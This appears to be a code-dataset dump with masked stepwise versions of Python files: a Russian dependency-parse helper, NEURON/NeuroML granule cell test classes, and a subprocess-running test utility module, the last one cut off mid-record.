"step-5": "import itertools\n\nimport urllib\n\nimport word2vec\n\n# MSD: http://corpus.leeds.ac.uk/mocky/ru-table.tab\n# Universal: http://universaldependencies.org/ru/pos/index.html\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON' # TODO: or DET \n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB' # TODO: or AUX\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n# ------------------\n# get_dep_tree(sentence)\n# ---\n# Creates a word dependency tree from a sentence.\n# Returns: deptree=(node, [deptree])\n\n# Creates a deptree from the webservice response dictionary\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) == idx]\n childTrees = [ make_dep_tree(respDict, k) for (k, c) in children ]\n\n return (el, childTrees)\n\ndef get_dep_tree(sentence):\n url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({'text': sentence})\n respRaw = urllib.request.urlopen(url)\n resp = respRaw.read()\n respStr = resp.decode('utf-8')\n respList = [ r[1:-1].split('\\\\t') for r in respStr[1:-1].split(',') ]\n respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for r in respList])\n\n (root, trees) = make_dep_tree(respDict, 0)\n\n if len(trees) == 0:\n print('No tree', sentence, trees)\n return None\n else:\n return trees[0]\n\n# ------------------\n# filter_dep_tree(tree)\n# ---\n# Filters out invaluable parts of speech.\n# Returns: deptree=(node, [deptree])\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or posp == 'ADV' or posp == 'VERB'):\n res = [ (root, list(itertools.chain.from_iterable([ filter_dep_tree(c) for c in children ]))) ]\n else:\n cd = [ filter_dep_tree(c) for c in children ]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n# ------------------\n# filter_dep_tree(tree)\n# ---\n# Prints a word dependency tree\n\ndef print_dep_tree(tree):\n def pdt(t, offset):\n root, children = t\n print(''.join([ ' ' for i in range(0, offset) ]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import sys, os; sys.path.insert(0,'..'); sys.path.insert(0,'../NEURON');
from tests.cells.NEURONCellTest import NEURONCellTest
from tests.cells.NeuroMLCellTest import NeuroMLCellTest
class NEURON(NEURONCellTest):
def __init__(self):
super(NEURON, self).__init__()
self.path = "../NEURON/granule.hoc"
self.label = "granule"
self.resultsFile = "results/cells/granule/NEURON.json"
self.currentRange = (-0.01, 0.1)
def prepare(self, h):
# Build the network with 1GC
sys.path.append(os.getcwd())
import customsim
import modeldata
customsim.setup(1, 1)
model = modeldata.getmodel()
cell = model.granules[110821] # The GC of the first MC
h.celsius = 24
return cell
class NeuroML(NeuroMLCellTest):
def __init__(self):
super(NeuroML, self).__init__()
self.path = "../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml"
self.label = "granule"
self.resultsFile = "results/cells/granule/NeuroML.json"
self.id = "Granule_0_110821"
self.currentRange = (-0.01, 0.1)
def prepare(self, h):
# Load the cell hoc
h.load_file(self.id+".hoc")
cell = getattr(h,self.id)()
h.celsius = 24
return cell
|
normal
|
{
"blob_id": "6dbafbcf126c37edb2187eb28c01e2c1125c1c64",
"index": 7134,
"step-1": "<mask token>\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n <mask token>\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-2": "<mask token>\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n sys.path.append(os.getcwd())\n import customsim\n import modeldata\n customsim.setup(1, 1)\n model = modeldata.getmodel()\n cell = model.granules[110821]\n h.celsius = 24\n return cell\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-3": "<mask token>\nsys.path.insert(0, '..')\nsys.path.insert(0, '../NEURON')\n<mask token>\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n sys.path.append(os.getcwd())\n import customsim\n import modeldata\n customsim.setup(1, 1)\n model = modeldata.getmodel()\n cell = model.granules[110821]\n h.celsius = 24\n return cell\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-4": "import sys, os\nsys.path.insert(0, '..')\nsys.path.insert(0, '../NEURON')\nfrom tests.cells.NEURONCellTest import NEURONCellTest\nfrom tests.cells.NeuroMLCellTest import NeuroMLCellTest\n\n\nclass NEURON(NEURONCellTest):\n\n def __init__(self):\n super(NEURON, self).__init__()\n self.path = '../NEURON/granule.hoc'\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NEURON.json'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n sys.path.append(os.getcwd())\n import customsim\n import modeldata\n customsim.setup(1, 1)\n model = modeldata.getmodel()\n cell = model.granules[110821]\n h.celsius = 24\n return cell\n\n\nclass NeuroML(NeuroMLCellTest):\n\n def __init__(self):\n super(NeuroML, self).__init__()\n self.path = (\n '../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml')\n self.label = 'granule'\n self.resultsFile = 'results/cells/granule/NeuroML.json'\n self.id = 'Granule_0_110821'\n self.currentRange = -0.01, 0.1\n\n def prepare(self, h):\n h.load_file(self.id + '.hoc')\n cell = getattr(h, self.id)()\n h.celsius = 24\n return cell\n",
"step-5": "import sys, os; sys.path.insert(0,'..'); sys.path.insert(0,'../NEURON');\r\nfrom tests.cells.NEURONCellTest import NEURONCellTest\r\nfrom tests.cells.NeuroMLCellTest import NeuroMLCellTest\r\n\r\nclass NEURON(NEURONCellTest):\r\n\r\n def __init__(self):\r\n super(NEURON, self).__init__()\r\n\r\n self.path = \"../NEURON/granule.hoc\"\r\n self.label = \"granule\"\r\n self.resultsFile = \"results/cells/granule/NEURON.json\"\r\n self.currentRange = (-0.01, 0.1)\r\n\r\n def prepare(self, h):\r\n\r\n # Build the network with 1GC\r\n sys.path.append(os.getcwd())\r\n import customsim\r\n import modeldata\r\n customsim.setup(1, 1)\r\n model = modeldata.getmodel()\r\n cell = model.granules[110821] # The GC of the first MC\r\n\r\n h.celsius = 24\r\n\r\n return cell\r\n\r\nclass NeuroML(NeuroMLCellTest):\r\n def __init__(self):\r\n super(NeuroML, self).__init__()\r\n\r\n self.path = \"../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml\"\r\n self.label = \"granule\"\r\n self.resultsFile = \"results/cells/granule/NeuroML.json\"\r\n self.id = \"Granule_0_110821\"\r\n self.currentRange = (-0.01, 0.1)\r\n\r\n def prepare(self, h):\r\n # Load the cell hoc\r\n h.load_file(self.id+\".hoc\")\r\n\r\n cell = getattr(h,self.id)()\r\n\r\n h.celsius = 24\r\n\r\n return cell\r\n\r\n\r\n\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
# -*- coding: utf-8 -*-
import os
import sys
import socket
import signal
import functools
import atexit
import tempfile
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue, Empty
from time import sleep
import json
from .exceptions import CommandError, TimeoutWaitingFor
ON_POSIX = 'posix' in sys.builtin_module_names
# Directory relative to basetest module location
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
# Location of binary files (usually the src/ folder)
BIN_PREFIX = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "..", "src")
)
# Default location of test certificates
DEFAULT_CERT_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_certs")
)
# Default location of test extensions
DEFAULT_EXTENSION_PATH = os.path.abspath(
os.path.join(CURRENT_DIR, "..", "test_extensions")
)
# Environment flags to control skipping of shared tests
SHARED_SKIP = os.environ.get("SHARED_SKIP", False)
# Environment flags to control use of PATH or in-tree binaries
SHARED_USE_PATH = os.environ.get("SHARED_USE_PATH", False)
UUID_REGEXP = ("[0-9A-Fa-f]{8}-" + ("[0-9A-Fa-f]{4}-" * 3) + "[0-9A-Fa-f]{12}")
def shared_binary_location(cmd="shared"):
""" ../src/ is used by default.
"""
return os.path.join(BIN_PREFIX, cmd)
return binary_location(cmd, SHARED_USE_PATH)
def binary_location(cmd, USE_PATH=False):
""" ../src/ is used by default.
"""
return os.path.join(BIN_PREFIX, cmd)
def wait_condition(cond, timeout=1, sleeptime=.01):
"""Wait for condition to return anything other than None
"""
# NOTE Increasing sleeptime can dramatically increase testsuite runtime
# It also reduces CPU load significantly
if timeout is None:
timeout = 1
if timeout < sleeptime:
print("Warning, timeout cannot be smaller than", sleeptime)
timeout = sleeptime
# Max number of attempts until giving up
tries = int(timeout / sleeptime)
for i in range(tries):
val = cond()
if val is not None:
break
sleep(sleeptime)
return val
def wait_process(pid, timeout=None):
"""Wait for process to finish
"""
def process():
try:
os.kill(pid, 0)
except OSError:
# Process is dead
return True
else:
# Process is still ticking
return None
return wait_condition(process, timeout)
def _queue_output(arguments, pidq, outputq):
"""Read/Write output/input of given process.
This function is meant to be executed in a thread as it may block
"""
kwargs = arguments["process"]
input = arguments["input"]
try:
proc = Popen(**kwargs)
except OSError as e:
# pid None is read by the main thread as a crash of the process
pidq.put(None)
outputq.put((
"",
("Unexpected exception caught during execution: '{0}' . ".format(e)),
255)) # false exitcode
return
# Put the PID in the queue for main process to know.
pidq.put(proc.pid)
# Send input and wait for finish
out, err = proc.communicate(input)
out, err = out.decode('utf-8'), err.decode('utf-8')
# Give the output back to the caller
outputq.put((out, err, proc.returncode))
def _retrieve_output(thread, timeout, queue, thread_error):
"""Fetch output from binary subprocess queues
"""
# Try to join the thread on failure abort
thread.join(timeout)
if thread.isAlive():
# Join should have killed the thread. This is unexpected
raise TimeoutWaitingFor(thread_error + ". Unexpected error")
# Thread died so we should have output
try:
# data = (stdout, stderr, exitcode)
data = queue.get(timeout=timeout)
except Empty:
data = TimeoutWaitingFor("streams from program")
return data
def _get_output(arguments, timeout=None):
"""Collect output from the subprocess without blocking the main process if
subprocess hangs.
"""
# NOTE Increase this value if tests fail with None being received as
# stdout/stderr instead of the expected content
output_timeout = 0.1 # seconds
pidq = Queue()
outputq = Queue()
t = Thread(target=_queue_output, args=(arguments, pidq, outputq))
t.daemon = True
t.start()
try:
pid = pidq.get(timeout=timeout)
except Empty:
pid = None
# Process crashed or timed out for some reason
if pid is None:
return _retrieve_output(t, output_timeout, outputq,
"Program to start")
# Wait for process to finish (normal execution)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq,
"Program thread to join")
# If we reach this point we assume the process got stuck or timed out
for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):
# Start with lower signals and escalate if process ignores them
try:
os.kill(pid, signal.SIGABRT)
except OSError as e:
# 3 means the process finished/died between last check and now
if e.errno != 3:
raise
# Wait for process to finish (should die/exit after signal)
state = wait_process(pid, timeout)
if state:
# Process finished
return _retrieve_output(t, output_timeout, outputq,
"Program to die")
# This should never happen but in case something goes really bad
raise OSError("Program stopped responding and couldn't be killed")
def run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE,
merge_streams=False, env=os.environ, timeout=None):
"Run a subprocess and wait for it to finish"
if input is None:
stdin = None
else:
stdin = PIPE
if merge_streams:
stderr = STDOUT
else:
stderr = PIPE
arguments = {
"process": {
"args": cmd,
"stdin": stdin,
"stdout": stdout,
"stderr": stderr,
"bufsize": 1,
"close_fds": ON_POSIX,
"env": env,
},
"input": input,
}
out, err, exit = _get_output(arguments, timeout)
if merge_streams:
if exit != 0:
raise CommandError(cmd, exit, out)
else:
return exit, out
else:
if exit != 0:
raise CommandError(cmd, exit, out, err)
else:
return exit, out, err
def run_cmd_wait_nofail(*args, **kwargs):
"""Same as run_cmd_wait but silence the exception if it happens"""
try:
return run_cmd_wait(*args, **kwargs)
except CommandError as e:
return e.code, e.out, e.err
def memoize(obj):
"""Keep an in-memory cache of function results given its inputs
"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
from shutil import which
which = memoize(which)
def parse_datafile(file):
"""Parse .data files, treating files as JSON
"""
data = []
with open(file) as fh:
for line in fh:
line = line.rstrip("\n")
# Turn [] strings into {} to be treated properly as JSON hashes
if line.startswith('[') and line.endswith(']'):
line = '{' + line[1:-1] + '}'
if line.startswith("{"):
data.append(json.loads(line))
else:
data.append(line)
return data
def mkstemp(data):
"""
Create a temporary file that is removed at process exit
"""
def rmtemp(name):
try:
os.remove(name)
except OSError:
pass
f = tempfile.NamedTemporaryFile(delete=False)
f.write(data)
f.close()
# Ensure removal at end of python session
atexit.register(rmtemp, f.name)
return f.name
def mkstemp_exec(data):
"""Create a temporary executable file that is removed at process exit
"""
name = mkstemp(data)
os.chmod(name, 0o755)
return name
# vim: ai sts=4 et sw=4
|
normal
|
{
"blob_id": "7f220a970d65a91228501f7db59089e6c0604fb5",
"index": 9915,
"step-1": "<mask token>\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\n<mask token>\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\n<mask token>\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-2": "<mask token>\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n return True\n else:\n return None\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE, merge_streams=\n False, env=os.environ, timeout=None):\n \"\"\"Run a subprocess and wait for it to finish\"\"\"\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n arguments = {'process': {'args': cmd, 'stdin': stdin, 'stdout': stdout,\n 'stderr': stderr, 'bufsize': 1, 'close_fds': ON_POSIX, 'env': env},\n 'input': input}\n out, err, exit = _get_output(arguments, timeout)\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n elif exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip('\\n')\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n if line.startswith('{'):\n data.append(json.loads(line))\n else:\n data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-3": "<mask token>\n\n\ndef shared_binary_location(cmd='shared'):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)\n\n\ndef binary_location(cmd, USE_PATH=False):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n return True\n else:\n return None\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE, merge_streams=\n False, env=os.environ, timeout=None):\n \"\"\"Run a subprocess and wait for it to finish\"\"\"\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n arguments = {'process': {'args': cmd, 'stdin': stdin, 'stdout': stdout,\n 'stderr': stderr, 'bufsize': 1, 'close_fds': ON_POSIX, 'env': env},\n 'input': input}\n out, err, exit = _get_output(arguments, timeout)\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n elif exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip('\\n')\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n if line.startswith('{'):\n data.append(json.loads(line))\n else:\n data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-4": "<mask token>\nON_POSIX = 'posix' in sys.builtin_module_names\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nBIN_PREFIX = os.path.abspath(os.path.join(CURRENT_DIR, '..', '..', 'src'))\nDEFAULT_CERT_PATH = os.path.abspath(os.path.join(CURRENT_DIR, '..',\n 'test_certs'))\nDEFAULT_EXTENSION_PATH = os.path.abspath(os.path.join(CURRENT_DIR, '..',\n 'test_extensions'))\nSHARED_SKIP = os.environ.get('SHARED_SKIP', False)\nSHARED_USE_PATH = os.environ.get('SHARED_USE_PATH', False)\nUUID_REGEXP = '[0-9A-Fa-f]{8}-' + '[0-9A-Fa-f]{4}-' * 3 + '[0-9A-Fa-f]{12}'\n\n\ndef shared_binary_location(cmd='shared'):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)\n\n\ndef binary_location(cmd, USE_PATH=False):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n return True\n else:\n return None\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n 